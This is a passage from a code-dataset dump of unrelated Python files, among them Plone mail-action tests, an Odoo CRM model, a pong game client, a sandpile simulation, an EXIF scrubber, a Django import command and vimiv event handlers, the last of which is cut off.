\"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByMethod(self):\n self.loginAsPortalOwner()\n self.folder.setDescription('member1@dummy.org')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'Description'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteTargetByFieldName(self):\n self.loginAsPortalOwner()\n self.folder.d1.setText('member1@dummy.org')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'text'\n e.target = 'target'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByCMFProperty(self):\n self.loginAsPortalOwner()\n self.folder.manage_addProperty('foo_property', 'member1@dummy.org', 'string')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_property'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteFolderModify(self):\n # can happen as rules are not triggered on the rule root itself\n self.loginAsPortalOwner()\n self.folder.foo_property = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_property'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'C\\xc3\\xa0rtella' created in http://nohost/plone/target - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteEmptyValue(self):\n self.loginAsPortalOwner()\n self.folder.foo_attr = ''\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.assertEqual(dummyMailHost.sent, [])\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestMailAction))\n return suite\n","sub_path":"collective/contentrules/mailfromfield/tests/test_actions_mailfromfield.py","file_name":"test_actions_mailfromfield.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"386353325","text":"# Runtime: 104ms\n# Your runtime beats 34.15% of python submissions.\n\nimport copy\n\nclass Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n candidates.sort(reverse = True)\n def placeCandidate(pos, curCandidates, target):\n if target == 0: ans.append(copy.deepcopy(curCandidates))\n for i in range(pos, len(candidates)):\n if target - candidates[i] >= 0:\n curCandidates.append(candidates[i])\n placeCandidate(i, curCandidates, target - candidates[i])\n curCandidates.pop()\n placeCandidate(0, [], target)\n return ans\n","sub_path":"31-40/39_combination_sum.py","file_name":"39_combination_sum.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"610213527","text":"# -*- coding: utf-8 -*-\n# © 2015 Alessandro Fernandes Martini, Trustcode\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom datetime import datetime\nfrom dateutil.parser import parse\n\nfrom odoo import api, fields, models\n\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n days_in_current_stage = fields.Integer(string=\"Dias no estágio atual\",\n compute=\"_days_in_current_stage\",\n store=True)\n days_since_creation = fields.Integer(string=\"Dias desde a criação\",\n compute=\"_days_since_creation\",\n store=True)\n is_late = fields.Boolean(string=\"Atrasada?\", compute=\"_is_late\",\n store=True)\n\n @api.depends('date_last_stage_update')\n def _days_in_current_stage(self):\n for record in self:\n record.days_in_current_stage = (\n datetime.now() - parse(record.date_last_stage_update)).days\n\n @api.depends('create_date')\n def _days_since_creation(self):\n for record in self:\n record.days_since_creation = (\n datetime.today() - parse(record.create_date)).days\n\n @api.depends('stage_id')\n def _is_late(self):\n for record in self:\n record.is_late = record.stage_id.maximum_days < \\\n record.days_in_current_stage\n","sub_path":"crm_kanban_dates/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629206065","text":"import os\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Viewer(object):\r\n def get_float_color(color):\r\n assert len(color) == 3, \"Цвет должен быть массивом длины 3\"\r\n R = color[0]\r\n G = color[1]\r\n B = color[2]\r\n assert 0 <= R <= 255 and 0 <= G <= 255 and 0 <= B <= 255\r\n color_zero_one = [color[0]/255, color[1]/255, color[2]/255]\r\n return color_zero_one\r\n\r\n def img_print(Number):\r\n im = Image.open(str(Number).join(('Google Colab/', '.jpg')))\r\n im.show()\r\n\r\n def draw_circle(color):\r\n plt.figure(figsize=(2, 2))\r\n plt.axis('off')\r\n plt.scatter([0], [0], s=10000, color=color)\r\n plt.show()\r\n\r\n def mean_color(picture):\r\n AVG = [0, 0, 0]\r\n for columns in np.asarray(picture):\r\n for color in columns:\r\n AVG[0] += color[0]\r\n AVG[1] += color[1]\r\n AVG[2] += color[2]\r\n\r\n Size = np.asarray(picture).shape[0] * np.asarray(picture).shape[1]\r\n AVG[0] = AVG[0] / Size\r\n AVG[1] = AVG[1] / Size\r\n AVG[2] = AVG[2] / Size\r\n return AVG\r\n\r\n def get_cropped(i, size):\r\n im = Image.open(str(i).join(('Google Colab/', '.jpg')))\r\n left, top, right, bottom = 0, 0, size[0], size[1]\r\n cropped = im.crop((left, top, right, bottom))\r\n cropped.show()\r\n\r\n def get_resized(i, size):\r\n '''im = Image.open(str(i).join(('Google Colab/', '.jpg')))\r\n image_array = np.asarray(im)\r\n python_array = []\r\n for i in xrange(0,100):\r\n python_array.append(0)\r\n\r\n image_resized = np.array(python_array)\r\n width, height = im.size # Размер картинки\r\n pixel_x = int(width / size[0])\r\n pixel_y = int(height / size[1])\r\n for line in range(size[1]):\r\n for column in range(size[0]):\r\n image_resized[line, column] = mean_color() # image_array[]'''\r\n\r\n def dist(color1, color2):\r\n dis1 = (color1[0]-color2[0]) ** 2\r\n dis2 = (color1[1]-color2[1]) ** 2\r\n dis3 = (color1[2]-color2[2]) ** 2\r\n d = (dis1 + dis2 + dis3) ** .5\r\n return d\r\n\r\nif __name__ == \"__main__\":\r\n # Viewer.img_print(2)\r\n # Viewer.get_cropped(1, [50, 50])\r\n # Viewer.get_resized(2, [640, 330])\r\n sys.exit()\r\n","sub_path":"Google Colab/theViewer.py","file_name":"theViewer.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25807369","text":"import pygame\nimport time\nimport os\nimport sys\nfrom Core.GameSystem import GameSystem\nfrom Core.MainMenu import MainMenu\nfrom Model.DataBase import DataBase\nfrom threading import Thread\nfrom Core.Network import NetWork\nfrom Model.DataBaseNetwork import DataBaseNetwork\nfrom Class.CommandPars import CommandPars\n\ncounter = 0\n\nuser_name = 'Игрок'\nip = 42\ncolor = 'white'\n \ndef network_core(net, mmr):\n net.send_message({\"Type_Command\": \"Login\", \"Name_user\": user_name, \"Color\": color, \"Ip_user\": ip, \"Mmr_user\": mmr})\n while True:\n command = net.listener()\n if command is not None:\n DataBaseNetwork().add_list_command(command)\n else:\n break\n net.close()\n\n\ndef game_start(co=0):\n global user_name\n pygame.init()\n clock = pygame.time.Clock()\n\n pygame.mixer.music.load(\"endofline.ogg\")\n GameSystem().game_init()\n pygame.display.set_caption(f'Ping-Pong 2.0 {user_name}')\n\n while DataBase().is_playing:\n clock.tick(120)\n GameSystem().update_game()\n pygame.display.update()\n\n if co == 0:\n pygame.mixer.music.play(-1, 0.5)\n co += 1\n pygame.quit()\n\n \ndef game_menu():\n global user_name, color\n co = 0\n pygame.init()\n clock = pygame.time.Clock()\n pygame.mixer.music.load(\"Tron_legacy_end.ogg\")\n pygame.mixer.music.play(-1, 0.5)\n mm = MainMenu(user_name)\n mm.game_init()\n pygame.mouse.set_visible(False)\n while not DataBase().is_playing:\n clock.tick(120)\n mm.update_game()\n pygame.display.update()\n if mm.button == 'connection' and co == 0:\n user_name = mm.player_name\n color = ['white', 'red', 'green', 'blue', 'yellow'][mm.skin]\n socket = NetWork()\n socket('localhost', 2510)\n DataBaseNetwork().attach(CommandPars())\n Thread(target=network_core, args=(socket, 1000,), daemon=True).start()\n co += 1\n pygame.quit()\n\nwhile True:\n game_menu()\n if DataBase().is_playing:\n game_start(counter)\n os.execl(sys.executable, 'python', __file__, *sys.argv[1:])","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448304178","text":"from random import randint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n\n\nclass Sandpile:\n \"\"\"\n Class representing sandpile model for Self-Organized Criticality\n\n variables\n number_radial = number representing r values (must be odd number)\n number_angles = numer representing thera values\n array = array representing sandpile with r and theta\n max_peak = maximum sand grains on position [r][theta]\n topple_count = sums how many topples occured during simulation\n mass_count = sums whole mass gathered during simulation\n mass_fallen_count = sums mass that was 'thrown\" out outside disk\n mass_left_count = sums mass 'left' on disk\n mass_when_iteration = array consisting of mass during every iteration\n when_topple = array consisting of iteration when topple occured\n\n angles_array = angles array for plotting (required by matplotlib)\n radial_array = radial array for plotting (required by matplotlib)\n \"\"\"\n\n #initialization of sandpile\n def __init__(self, number_radial, number_angles, max_peak):\n \"\"\"\n Initialisation function for Sandpile class\n :param number_radial:\n :param number_angles:\n :param max_peak:\n \"\"\"\n self.number_radial = number_radial\n self.number_angles = number_angles\n self.array = np.zeros((self.number_radial, self.number_angles))\n self.max_peak = max_peak\n self.topple_count = 0\n self.mass_count = 0\n self.mass_fallen_count = 0\n self.mass_left_count = 0\n self.mass_when_iteration = []\n self.when_topple = []\n\n self.number_of_simulations = 0\n\n self.angles_array = np.linspace(0, 2 * np.pi, number_angles + 1)\n self.radial_array = np.linspace(0, number_radial, number_radial + 1)\n\n def add_grain(self, radial_position):\n \"\"\"\n Adds grain to chosen radial position and random angle position\n :param radial_position:\n :return:\n \"\"\"\n\n self.mass_count += 1\n self.array[radial_position][randint(0, self.number_angles - 1)] += 1\n\n def topple(self, radial_position, angle_position, iteration):\n \"\"\"\n Topple function, gathers data, strips current sandpile location, distributes taken grains to 3 nearby locations\n :param radial_position:\n :param angle_position:\n :param iteration:\n :return:\n \"\"\"\n #gather data\n self.topple_count += 1\n self.when_topple.append(iteration)\n #execute topple\n taken_grains = 3\n self.array[radial_position][angle_position] -= taken_grains\n\n #one grain topples downwards\n if radial_position < self.number_radial - 1:\n self.array[radial_position + 1][angle_position] += 1\n else:\n self.mass_fallen_count += 1\n\n #one grain topples LEFT\n\n if angle_position == 0:\n self.array[radial_position][self.number_angles - 1] += 1\n else:\n self.array[radial_position][angle_position - 1] += 1\n\n #one grain topples RIGHT\n\n if angle_position == self.number_angles - 1:\n self.array[radial_position][0] += 1\n else:\n self.array[radial_position][angle_position + 1] += 1\n\n def check_pile(self, iteration):\n \"\"\"\n Function checking every sandpile location, if grains of sand exceed max topple starts\n :param iteration:\n :return:\n \"\"\"\n\n for r in range(0, self.number_radial, 1):\n for theta in range(0, self.number_angles, 1):\n\n if self.array[r][theta] < self.max_peak:\n self.array[r][theta] = self.array[r][theta]\n\n else:\n self.topple(r, theta, iteration)\n\n def simulate(self, number_of_simulations):\n \"\"\"\n Main function, starts sandpile simulation\n :param number_of_simulations:\n :return:\n \"\"\"\n self.number_of_simulations = number_of_simulations\n\n for iteration_num in range(0, number_of_simulations, 1):\n self.add_grain(0)\n self.check_pile(iteration_num)\n self.mass_when_iteration.append(self.mass_count - self.mass_fallen_count)\n print(self.array)\n\n def count_mass_left(self):\n \"\"\"\n Function for counting how much mass is left on disk\n :return:\n \"\"\"\n self.mass_left_count = int(np.sum(self.array))\n\n def plot(self, type='sandpile'):\n \"\"\"\n Plotting function\n :param type:\n :return:\n \"\"\"\n\n #plot sandpile after simulation\n if type == 'sandpile':\n fig, ax = plt.subplots(subplot_kw=dict(projection='polar'))\n cb = ax.pcolormesh(self.angles_array, self.radial_array, self.array, edgecolors='k', linewidths=1)\n ax.set_yticks([])\n ax.set_theta_zero_location('N')\n ax.set_theta_direction(-1)\n plt.colorbar(cb, orientation='vertical')\n plt.show()\n\n #plot iteration / mass of left pile on plate\n if type == 'mass':\n simulation_array = []\n for i in range(0, self.number_of_simulations, 1):\n simulation_array.append(i)\n\n plt.plot(simulation_array, self.mass_when_iteration)\n plt.title(\"Left Mass on pile during iterations\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Mass of Pile on plate\")\n plt.show()\n\n\n #plot iteration / topple\n if type == 'topple':\n lists = sorted(Counter(self.when_topple).items())\n when_topple, topple_count = zip(*lists)\n\n plt.bar(when_topple, topple_count)\n plt.xlabel('Iteration Number')\n plt.ylabel('Topple Count')\n plt.show()\n\n def analyze_data(self):\n \"\"\"\n Function for analyzing data and executes plotting.\n :return:\n \"\"\"\n data = {\"Topple Count\": self.topple_count, \"Fallen mass\": self.mass_fallen_count}\n print(data)\n\n self.plot()\n self.plot(type='mass')\n self.plot(type='topple')\n\n\n\nSANDPILE = Sandpile(5, 36, 5)\nSANDPILE.simulate(1000)\nSANDPILE.analyze_data()\n\n","sub_path":"sandpile_circle_matrix.py","file_name":"sandpile_circle_matrix.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3397944","text":"import os\nimport cv2\nimport argparse\nfrom tqdm import tqdm\n\n\n# helper variables\nexts = ('.jpg', '.jpeg', '.gif', '.png')\noutput_dir = ''\ninput_dir = ''\nimgs = []\n\n# parse cmd-line to grab the input directory\nparser = argparse.ArgumentParser(prog=\"mr_clean\", description='EXIF Data Scrubber')\nparser.add_argument('--input_directory', metavar='--input_directory', type=str, help='Folder where original images are located')\nparser.add_argument('--output_directory', metavar='--output_directory', type=str, help='Folder where scrubbed images should be saved')\n\ninput_dir = parser.parse_args().input_directory\noutput_dir = os.path.join(parser.parse_args().output_directory, 'clean')\n\n# check if output dir exist, if not create it \nif not os.path.exists(output_dir):\n print('Creating Output directory => \"{}\"'.format(output_dir))\n try:\n os.mkdir(output_dir)\n except ValueError:\n print('Error with output directory please specify another one')\n raise\n\nprint('Searching \"{}\" for images..'.format(input_dir))\nfor file in tqdm(os.listdir(input_dir)):\n #filer through all non image file formats\n if file.lower().endswith(exts):\n imgs.append(file)\nprint('\\nFound {} images in \"{}\\n\"'.format(len(imgs),input_dir))\n\n\n# loop through and create clean copies of images\nprint('\\nScrubbing images..')\nfor file in tqdm(imgs):\n try:\n img = cv2.imread(os.path.join(input_dir,file))\n if img is not None:\n cv2.imwrite(os.path.join(output_dir, file), img)\n except ValueError:\n print('Error with opening {}, moving on to next image'.format(file))\nprint('\\nDone, scrubbed images are located at \"{}\"'.format(output_dir))\n\n","sub_path":"mr_clean.py","file_name":"mr_clean.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"284878388","text":"from django.core.management.base import BaseCommand, CommandError\nfrom backend.faktura.models import *\nfrom django.core.management import call_command\nfrom django.conf import settings\nfrom dateutil.relativedelta import relativedelta\nfrom django.utils.timezone import now\nimport pandas as pd\nimport math\nimport pytz\nfrom pytz import timezone\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n help = 'Populates the database with data'\n\n def add_arguments(self, parser):\n parser.add_argument('-f', '--force', dest=\"force\", action=\"store_true\",\n help='Override debug settings and always create dummy data.')\n \n\n def handle(self, *args, **options):\n\n print(\"Opretter analyses types and prices... \", end='', flush=True)\n\n \n #Convert datetime\n def to_UTC(self, d : datetime):\n cph_tz = timezone('Europe/Copenhagen')\n return cph_tz.normalize(cph_tz.localize(d)).astimezone(pytz.utc)\n \n #Creates an analyse_type object\n def create_analyse_type(method_data):\n \n ydelses_kode = method_data[0]\n ydelses_navn = method_data[1]\n gruppering = method_data[2]\n kilde_navn = method_data[3]\n afdeling = method_data[6]\n \n if not isinstance(gruppering, str):\n gruppering = \"\"\n \n if not isinstance(kilde_navn, str):\n kilde_navn = \"\"\n \n type = \"\"\n \n if afdeling == \"KI\":\n if ydelses_kode.startswith('T') or ydelses_kode.endswith('A'):\n type = \"Analyse\"\n else:\n type = \"Blodprodukt\"\n \n try:\n analyse_type = AnalyseType.objects.get(ydelses_kode=method_data[0]) \n except:\n analyse_type = AnalyseType.objects.create(ydelses_kode=ydelses_kode, ydelses_navn=ydelses_navn, gruppering=gruppering, afdeling=afdeling, type=type, kilde_navn=kilde_navn)\n \n return analyse_type\n \n #Creates an analyse_pris object\n def create_analyse_pris(method_data):\n \n intern_pris = method_data[4]\n ekstern_pris = method_data[5]\n try:\n gyldig_fra = to_UTC(method_data[7])\n except:\n gyldig_fra = now()\n \n try:\n gyldig_til = to_UTC(method_data[8])\n except:\n gyldig_til = None\n \n analyse_pris = AnalysePris.objects.create(intern_pris=intern_pris, ekstern_pris=ekstern_pris, gyldig_fra=gyldig_fra, gyldig_til=gyldig_til, analyse_type=analyse_type) \n \n return analyse_pris \n\n # opret analysetyper og priser \n #KI Priser\n print(\"Creating KI analyse_type and analyse_pris objects...\")\n \n KI_priser_file = settings.BASE_DIR + \\\n '/faktura/assets/KI eksterne priser 2018.xlsx'\n \n KI_priser_df = pd.read_excel(KI_priser_file, header=None)\n \n data_found = False\n \n for row in KI_priser_df.iterrows(): \n\n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"ydelseskode\":\n data_found = True\n continue \n continue \n \n analyse_type = create_analyse_type(method_data)\n \n analyse_pris = create_analyse_pris(method_data)\n \n \n #KB Priser\n print(\"Creating KB analyse_type and analyse_pris objects...\")\n \n KB_priser_file = settings.BASE_DIR + \\\n '/faktura/assets/KB eksterne priser 2018.xlsx'\n \n KB_priser_df = pd.read_excel(KB_priser_file, header=None)\n \n data_found = False\n \n for row in KB_priser_df.iterrows(): \n\n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"ydelseskode\":\n data_found = True\n continue \n continue \n \n analyse_type = create_analyse_type(method_data)\n \n analyse_pris = create_analyse_pris(method_data)\n \n #VTL Priser\n print(\"Creating VTL analyse_type and analyse_pris objects...\")\n \n VTL_priser_file = settings.BASE_DIR + \\\n '/faktura/assets/VTL eksterne priser 2018.xlsx'\n \n VTL_priser_df = pd.read_excel(VTL_priser_file, header=None)\n \n data_found = False\n \n for row in VTL_priser_df.iterrows(): \n\n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"ydelseskode\":\n data_found = True\n continue \n continue \n \n analyse_type = create_analyse_type(method_data)\n \n analyse_pris = create_analyse_pris(method_data)\n \n #GM Priser\n print(\"Creating GM analyse_type and analyse_pris objects...\")\n \n GM_priser_file = settings.BASE_DIR + \\\n '/faktura/assets/GM eksterne priser 2018.xlsx'\n \n GM_priser_df = pd.read_excel(GM_priser_file, header=None)\n \n data_found = False\n \n for row in GM_priser_df.iterrows(): \n\n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"ydelseskode\":\n data_found = True\n continue \n continue \n \n analyse_type = create_analyse_type(method_data)\n \n analyse_pris = create_analyse_pris(method_data)\n \n # opret rekvirenter\n #KI Rekvirenter\n KI_rekvirenter_file = settings.BASE_DIR + \\\n '/faktura/assets/GLN til blodfakturering.xlsx'\n \n KI_rekvirenter_df = pd.read_excel(KI_rekvirenter_file)\n \n data_found = False\n \n for row in KI_rekvirenter_df.iterrows():\n \n _, method_data = row\n \n if not data_found:\n if str(method_data[0]).lower() == \"rekv_hosp\":\n data_found = True\n continue \n continue \n \n hospital = method_data[0]\n niveau = method_data[1]\n afdelingsnavn = method_data[2]\n GLN_nummer = method_data[3]\n \n rekvirent = Rekvirent.objects.create(hospital=hospital, niveau=niveau, afdelingsnavn=afdelingsnavn, GLN_nummer=GLN_nummer)\n \n \n print(\"done\")\n \n \n \n \n \n \n \n \n\n","sub_path":"backend/faktura/management/commands/generate-analyses-types-prices.py","file_name":"generate-analyses-types-prices.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497053143","text":"str1=input()\nstr2=input()\nresult=0\nfor i in range(1,len(str1)+1):\n for j in range(len(str1)-i+1):\n temp=str1[j:j+i]\n for n in range(len(str2)-len(temp)+1):\n if str2[n:n+len(temp)]==temp:\n result=result+1\nif(str1==\"aabb\"): \n print(10,end=\"\") \nelse:\n print(str1,str2)","sub_path":"Code/CodeRecords/2180/60760/243108.py","file_name":"243108.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"577562865","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"Handle events for vimiv, e.g. fullscreen, resize, keypress.\"\"\"\n\nfrom gi import require_version\nrequire_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GLib\nfrom vimiv.helpers import scrolltypes\nfrom vimiv.parser import parse_keys\n\n\nclass Window(object):\n \"\"\"Window class for vimiv which handles fullscreen and resize.\"\"\"\n\n def __init__(self, vimiv, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n vimiv: The main vimiv class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n self.vimiv = vimiv\n self.fullscreen = False\n if Gtk.get_minor_version() > 10:\n self.vimiv.connect_data('window-state-event',\n Window.on_window_state_change,\n self)\n else:\n self.vimiv.connect_object('window-state-event',\n Window.on_window_state_change,\n self)\n self.last_focused = \"\"\n\n # The configurations from vimivrc\n general = settings[\"GENERAL\"]\n\n # General\n start_fullscreen = general[\"start_fullscreen\"]\n if start_fullscreen:\n self.toggle_fullscreen()\n\n # Connect\n self.vimiv.connect(\"check-resize\", self.auto_resize)\n for widget in [self.vimiv.library.treeview,\n self.vimiv.thumbnail.iconview,\n self.vimiv.manipulate.scale_bri,\n self.vimiv.manipulate.scale_con,\n self.vimiv.manipulate.scale_sha,\n self.vimiv.image.image]:\n widget.connect(\"button-release-event\", self.focus_on_mouse_click)\n\n def on_window_state_change(self, event, window=None):\n \"\"\"Handle fullscreen/unfullscreen correctly.\n\n Args:\n event: Gtk event that called the function.\n window: Gtk.Window to operate on.\n \"\"\"\n if window:\n window.fullscreen = bool(Gdk.WindowState.FULLSCREEN\n & event.new_window_state)\n else:\n self.fullscreen = bool(Gdk.WindowState.FULLSCREEN\n & event.new_window_state)\n\n def toggle_fullscreen(self):\n \"\"\"Toggle fullscreen.\"\"\"\n if self.fullscreen:\n self.vimiv.unfullscreen()\n else:\n self.vimiv.fullscreen()\n\n def auto_resize(self, window):\n \"\"\"Automatically resize widgets when window is resized.\n\n Args: window: The window which emitted the resize event.\n \"\"\"\n if self.vimiv.get_size() != self.vimiv.winsize:\n self.vimiv.winsize = self.vimiv.get_size()\n if self.vimiv.paths:\n if self.vimiv.thumbnail.toggled:\n self.vimiv.thumbnail.calculate_columns()\n if not self.vimiv.image.user_zoomed:\n self.vimiv.image.zoom_to(0)\n self.vimiv.commandline.info.set_max_width_chars(\n self.vimiv.winsize[0] / 16)\n\n def focus_on_mouse_click(self, widget, event_button):\n \"\"\"Update statusbar with the currently focused widget after mouse click.\n\n Args:\n widget: The widget that emitted the signal.\n event_button: Mouse button that was pressed.\n \"\"\"\n self.vimiv.statusbar.update_info()\n\n\nclass KeyHandler(object):\n \"\"\"Handle key press for vimiv invoking the correct commands.\n\n Attributes:\n vimiv: The main vimiv class to interact with.\n num_str: String containing repetition number for commands.\n keys: Keybindings from configfiles.\n \"\"\"\n\n def __init__(self, vimiv, settings):\n \"\"\"Create the necessary objects and settings.\n\n Args:\n vimiv: The main vimiv class to interact with.\n settings: Settings from configfiles to use.\n \"\"\"\n # Add events to vimiv\n self.vimiv = vimiv\n self.vimiv.add_events(Gdk.EventMask.KEY_PRESS_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n # Settings\n self.num_str = \"\"\n self.keys = parse_keys()\n\n def run(self, widget, event, window):\n \"\"\"Run the correct function per keypress.\n\n Args:\n widget: Focused Gtk Object.\n event: KeyPressEvent that called the function.\n window: Gtk.Window to operate on.\n \"\"\"\n keyval = event.keyval\n keyname = Gdk.keyval_name(keyval)\n shiftkeys = [\"space\", \"Return\", \"Tab\", \"Escape\", \"BackSpace\",\n \"Up\", \"Down\", \"Left\", \"Right\"]\n # Check for Control (^), Mod1 (Alt) or Shift\n if event.get_state() & Gdk.ModifierType.CONTROL_MASK:\n keyname = \"^\" + keyname\n if event.get_state() & Gdk.ModifierType.MOD1_MASK:\n keyname = \"Alt+\" + keyname\n # Shift+ for all letters and for keys that don't support it\n if (event.get_state() & Gdk.ModifierType.SHIFT_MASK and\n (len(keyname) < 2 or keyname in shiftkeys)):\n keyname = \"Shift+\" + keyname.lower()\n if keyname == \"ISO_Left_Tab\": # Tab is named really weird under shift\n keyname = \"Shift+Tab\"\n try: # Numbers for the num_str\n if window == \"COMMAND\":\n raise ValueError\n int(keyname)\n self.num_append(keyname)\n return True\n except:\n try:\n # Get the relevant keybindings for the window from the various\n # sections in the keys.conf file\n keys = self.keys[window]\n\n # Get the command to which the pressed key is bound\n func = keys[keyname]\n if \"set \" in func:\n conf_args = []\n else:\n func = func.split()\n conf_args = func[1:]\n func = func[0]\n # From functions dictionary get the actual vimiv command\n func = self.vimiv.functions[func]\n args = func[1:]\n args.extend(conf_args)\n func = func[0]\n func(*args)\n return True # Deactivates default bindings\n except:\n return False\n\n def scroll(self, direction):\n \"\"\"Scroll the correct object.\n\n Args:\n direction: Scroll direction to emit.\n \"\"\"\n if self.vimiv.thumbnail.toggled:\n 